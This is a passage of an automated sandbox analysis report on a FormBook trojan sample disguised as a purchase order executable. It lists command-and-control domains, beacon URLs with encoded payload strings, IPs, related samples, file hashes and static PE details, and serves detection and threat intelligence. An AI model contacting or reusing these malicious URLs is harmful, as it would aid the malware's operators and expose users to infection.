            http://www.bola88site.one/3qit/0%Avira URL Cloudsafe
            http://www.kexweb.top/3bdq/2%VirustotalBrowse
            http://www.bola88site.one/3qit/2%VirustotalBrowse
            http://www.languagemodel.pro/nxfn/2%VirustotalBrowse
            http://www.kexweb.top/3bdq/?H0QP6=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&OXVx9=WNjT0%Avira URL Cloudsafe
            http://www.omexai.info/7xi5/6%VirustotalBrowse
            http://www.kexweb.top0%Avira URL Cloudsafe
            https://www.gandi.net/en/domain0%VirustotalBrowse
            http://www.languagemodel.pro/nxfn/?H0QP6=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x&OXVx9=WNjT0%Avira URL Cloudsafe
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            http://www.omexai.info/7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT100%Avira URL Cloudmalware
            http://www.tekilla.wtf/fpzw/100%Avira URL Cloudmalware
            https://whois.gandi.net/en/results?search=languagemodel.pro0%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjT100%Avira URL Cloudmalware
            https://whois.gandi.net/en/results?search=languagemodel.pro0%VirustotalBrowse
            http://www.kexweb.top2%VirustotalBrowse
            http://www.tekilla.wtf/fpzw/6%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.elsupertodo.net
            		148.72.152.174
            		truetrueunknown
            webredir.vip.gandi.net
            		217.70.184.50
            		truetrueunknown
            www.kexweb.top
            		63.250.47.40
            		truetrueunknown
            bola88site.one
            		172.96.191.39
            		truetrueunknown
            redirect.3dns.box
            		172.191.244.62
            		truetrue
              		unknown
              omexai.info
              		3.33.130.190
              		truetrueunknown
              www.bola88site.one
              		unknown
              		unknowntrueunknown
              www.tekilla.wtf
              		unknown
              		unknowntrueunknown
              www.omexai.info
              		unknown
              		unknowntrueunknown
              www.woshop.online
              		unknown
              		unknowntrueunknown
              www.kxshopmr.store
              		unknown
              		unknowntrueunknown
              www.languagemodel.pro
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.omexai.info/7xi5/true
              • 6%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.kexweb.top/3bdq/true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.languagemodel.pro/nxfn/true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.bola88site.one/3qit/true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.kexweb.top/3bdq/?H0QP6=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&OXVx9=WNjTtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.languagemodel.pro/nxfn/?H0QP6=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x&OXVx9=WNjTtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.omexai.info/7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjTtrue
              • Avira URL Cloud: malware
              		unknown
              http://www.tekilla.wtf/fpzw/true
              • 6%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.tekilla.wtf/fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjTtrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/ac/?q=netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYnetbtugc.exe, 00000005.00000002.2710234659.0000000004778000.00000004.10000000.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.00000000036A8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003C2D8000.00000004.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.gandi.net/en/domainnetbtugc.exe, 00000005.00000002.2710234659.0000000004DC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2711751819.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000003CF0000.00000004.00000001.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.kexweb.topfALrZoEgBHis.exe, 00000006.00000002.2709976615.0000000005433000.00000040.80000000.00040000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.ecosia.org/newtab/netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://whois.gandi.net/en/results?search=languagemodel.pronetbtugc.exe, 00000005.00000002.2710234659.0000000004DC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2711751819.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000003CF0000.00000004.00000001.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              172.191.244.62
              		redirect.3dns.boxUnited States
              		7018ATT-INTERNET4UStrue
              63.250.47.40
              		www.kexweb.topUnited States
              		22612NAMECHEAP-NETUStrue
              172.96.191.39
              		bola88site.oneCanada
              		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
              217.70.184.50
              		webredir.vip.gandi.netFrance
              		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
              148.72.152.174
              		www.elsupertodo.netUnited States
              		30083AS-30083-GO-DADDY-COM-LLCUStrue
              3.33.130.190
              		omexai.infoUnited States
              		8987AMAZONEXPANSIONGBtrue

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1515409
              Start date and time:2024-09-22 17:33:16 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 56s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:2
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:PO# Q919240.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@7/2@8/6
              EGA Information:
              • Successful, ratio: 75%
              HCA Information:
              • Successful, ratio: 92%
              • Number of executed functions: 47
              • Number of non-executed functions: 309
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing disassembly code.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              11:35:29API Interceptor2711433x Sleep call for process: netbtugc.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              172.191.244.62PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • www.tekilla.wtf/fpzw/
              EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
              • www.lurknlarkk.xyz/cjjz/
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • www.tekilla.wtf/fpzw/
              AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
              • www.hermesmilano.xyz/f3mz/
              DN.exeGet hashmaliciousFormBookBrowse
              • www.hermesmilano.xyz/f3mz/
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • www.tekilla.wtf/fpzw/
              GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
              • www.hermesmilano.xyz/lmxx/
              COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
              • www.tekilla.wtf/fpzw/
              Debit note Jan-Jul 2024.exeGet hashmaliciousFormBookBrowse
              • www.hermesmilano.xyz/f3mz/
              Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
              • www.tekilla.wtf/gou4/
              63.250.47.40PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/3bdq/
              k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
              • www.balclub.top/n6ow/
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/3bdq/
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/3bdq/
              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/mfb2/
              ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/mfb2/
              172.96.191.39PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/3qit/
              PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/3lkx/
              Purchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/3lkx/
              Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/3lkx/
              PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/3lkx/
              Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/3lkx/
              PO_20240906011824.exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/3lkx/
              doc330391202408011.exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/wqrm/
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/3qit/
              REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
              • www.bola88site.one/wqrm/

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              webredir.vip.gandi.netPO098765678.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              au1FjlRwFR.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              redirect.3dns.boxPAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              DN.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              Debit note Jan-Jul 2024.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
              • 172.191.244.62
              www.elsupertodo.netPAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              www.kexweb.topPAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ATT-INTERNET4USTsunami.arm.elfGet hashmaliciousMiraiBrowse
              • 172.12.118.97
              http://s--sso---uphold-cdn-auth.webflow.io/Get hashmaliciousHTMLPhisherBrowse
              • 13.32.27.68
              https://web-metmsk-chrmxtens.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
              • 13.32.27.107
              fzbl2RfIlG.exeGet hashmaliciousAsyncRAT, DcRatBrowse
              • 172.31.139.194
              http://is.gd/EmlK8CGet hashmaliciousUnknownBrowse
              • 13.32.23.8
              8zzBr1gT31.elfGet hashmaliciousMiraiBrowse
              • 12.82.79.92
              GyFcTadTZv.elfGet hashmaliciousMiraiBrowse
              • 12.73.170.234
              iZP1hJhnmz.elfGet hashmaliciousMiraiBrowse
              • 12.170.82.64
              dAlxfXyNm7.elfGet hashmaliciousMiraiBrowse
              • 12.197.137.121
              05KN0c1P2J.elfGet hashmaliciousMiraiBrowse
              • 13.202.73.59
              GANDI-ASDomainnameregistrar-httpwwwgandinetFRPO098765678.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              firmware.armv4l.elfGet hashmaliciousUnknownBrowse
              • 217.70.184.38
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              au1FjlRwFR.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              NAMECHEAP-NETUSADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
              • 162.0.236.169
              https://suspokertellscractor-f7a93a.ingress-florina.ewp.live/wp-content/plugins/unsemitions/infospage.phpGet hashmaliciousUnknownBrowse
              • 63.250.43.136
              http://siddiquimehvish07.github.io/neflixclone.github.ioGet hashmaliciousHTMLPhisherBrowse
              • 162.0.235.241
              https://tracking.dailyhealthalliance.com/index.php/lists/ow833rolea56c/unsubscribe/fd2523medreca/yc5259nwzeGet hashmaliciousUnknownBrowse
              • 199.188.201.195
              LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
              • 162.0.238.246
              https://aaa16-fa5c2b.ingress-comporellon.ewp.live/wp-content/plugins/idpass/pages/region.php?lcaGet hashmaliciousUnknownBrowse
              • 63.250.43.6
              https://urlz.fr/sfvmGet hashmaliciousUnknownBrowse
              • 63.250.43.5
              https://urlz.fr/sfvkGet hashmaliciousUnknownBrowse
              • 63.250.43.6
              http://redirectblacklitss-e3z.pages.dev/Get hashmaliciousHTMLPhisherBrowse
              • 162.213.255.57
              https://urlz.fr/sfsKGet hashmaliciousUnknownBrowse
              • 63.250.43.136
              LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGPAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 172.96.191.39
              PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
              • 172.96.191.39
              Purchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
              • 172.96.191.39
              Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
              • 172.96.191.39
              PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
              • 172.96.191.39
              Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
              • 172.96.191.39
              OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
              • 103.150.11.230
              5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
              • 103.150.11.230
              uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
              • 103.150.11.230
              PO_20240906011824.exeGet hashmaliciousFormBookBrowse
              • 172.96.191.39
              AS-30083-GO-DADDY-COM-LLCUSPAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              LisectAVT_2403002B_136.dllGet hashmaliciousEmotetBrowse
              • 207.38.84.195
              Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
              • 209.126.113.133
              http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.htmlGet hashmaliciousHTMLPhisherBrowse
              • 148.72.158.229
              msimg32.dllGet hashmaliciousRemcosBrowse
              • 148.72.177.212
              Dados Do Hospede.ppamGet hashmaliciousNjratBrowse
              • 148.72.177.212

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\01194HH4

              Download File
              Process:C:\Windows\SysWOW64\netbtugc.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
              Category:modified
              Size (bytes):196608
              Entropy (8bit):1.1215420383712111
              Encrypted:false
              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
              MD5:9A809AD8B1FDDA60760BB6253358A1DB
              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\cunili

              Download File
              Process:C:\Users\user\Desktop\PO# Q919240.exe
              File Type:data
              Category:modified
              Size (bytes):286720
              Entropy (8bit):7.995377985244079
              Encrypted:true
              SSDEEP:6144:ERRRRARRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRv:ERRRRARRRRRRRRRRRRRRRRRRRRRRRRRv
              MD5:90530F170115D5606A50E7B9FF5043E4
              SHA1:A20F2DDBA1832E5CA149DA89749B869FAC26CA88
              SHA-256:886B779492FA64CB8BB7A90213DD4F1615DD23952F794B9BB0242808F01012C8
              SHA-512:667DD07E041D37B60FD083968046132A94AF7B8799FDEE46E3B1AECDD783FE812CB8B1E63BA8D24229AE14B0AD717F8AFD88559A13DDE59F8F3D3E2C649C0D8B
              Malicious:false
              Reputation:low
              Preview:u..b.KWU1...A.....JA..dT0...9KWU1X1ZHK5WP8MJBAXULW8JO09KWU.X1ZFT.YP.D.c.Y..vl"&C.;%:V*P7h(T9>W9j $x'99.#!.}..u\7U?fF8]t8MJBAXU5V1.rP^.j5V..:/./...w*%.B...*(.#....8V.."V?mX*.BAXULW8J.u9K.T0X..b.5WP8MJBA.UNV3KD09.SU1X1ZHK5W@,MJBQXUL7<JO0yKWE1X1XHK3WP8MJBA^ULW8JO09+SU1Z1ZHK5WR8..BAHULG8JO0)KWE1X1ZHK%WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5W~L(26AXU(.<JO 9KW.5X1JHK5WP8MJBAXULW.JOP9KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1ZHK5WP8MJBAXULW8JO09KWU1X1Z

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.566837307570516
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:PO# Q919240.exe
              File size:1'412'827 bytes
              MD5:1cdbbc595757ea5f6e9393d622d66e10
              SHA1:23eee5c85533ade7e463f0ad52bb044292aa4b43
              SHA256:1872f51b5d3913490f3936ab41a7388212d4c10e389eb211bc448029380891ce
              SHA512:0559c792055b7f11653ac3cad6918ae47f32e8b36e660560f1300fa2aa26fe54a1d40ccef2502e886e0867cd12070c468c59d8ab563bc61be9f6afa6dfa2e8db
              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaC1ht4AIT8U9gMPUuCzP8HVpuLxfIj:7JZoQrbTFZY1iaCd4AIAUdVpuxIj
              TLSH:4165F121F9D69036C2B323B19E7FF7A9963D79260326D29B23C82D315E605416B39733
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

              File Icon

              Icon Hash:1733312925935517

              Static PE Info

              General

              Entrypoint:0x4165c1
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

              Entrypoint Preview

              Instruction
              call 00007FEDCD0048ABh
              jmp 00007FEDCCFFB71Eh
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push edi
              push esi
              mov esi, dword ptr [ebp+0Ch]
              mov ecx, dword ptr [ebp+10h]
              mov edi, dword ptr [ebp+08h]
              mov eax, ecx
              mov edx, ecx
              add eax, esi
              cmp edi, esi
              jbe 00007FEDCCFFB89Ah
              cmp edi, eax
              jc 00007FEDCCFFBA36h
              cmp ecx, 00000080h
              jc 00007FEDCCFFB8AEh
              cmp dword ptr [004A9724h], 00000000h
              je 00007FEDCCFFB8A5h
              push edi
              push esi
              and edi, 0Fh
              and esi, 0Fh
              cmp edi, esi
              pop esi
              pop edi
              jne 00007FEDCCFFB897h
              jmp 00007FEDCCFFBC72h
              test edi, 00000003h
              jne 00007FEDCCFFB8A6h
              shr ecx, 02h
              and edx, 03h
              cmp ecx, 08h
              jc 00007FEDCCFFB8BBh
              rep movsd
              jmp dword ptr [00416740h+edx*4]
              mov eax, edi
              mov edx, 00000003h
              sub ecx, 04h
              jc 00007FEDCCFFB89Eh
              and eax, 03h
              add ecx, eax
              jmp dword ptr [00416654h+eax*4]
              jmp dword ptr [00416750h+ecx*4]
              nop
              jmp dword ptr [004166D4h+ecx*4]
              nop
              inc cx
              add byte ptr [eax-4BFFBE9Ah], dl
              inc cx
              add byte ptr [ebx], ah
              ror dword ptr [edx-75F877FAh], 1
              inc esi
              add dword ptr [eax+468A0147h], ecx
              add al, cl
              jmp 00007FEDCF474097h
              add esi, 03h
              add edi, 03h
              cmp ecx, 08h
              jc 00007FEDCCFFB85Eh
              rep movsd
              jmp dword ptr [00000000h+edx*4]

              Rich Headers

              Programming Language:
              • [ C ] VS2010 SP1 build 40219
              • [C++] VS2010 SP1 build 40219
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [ASM] VS2010 SP1 build 40219
              • [RES] VS2010 SP1 build 40219
              • [LNK] VS2010 SP1 build 40219

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
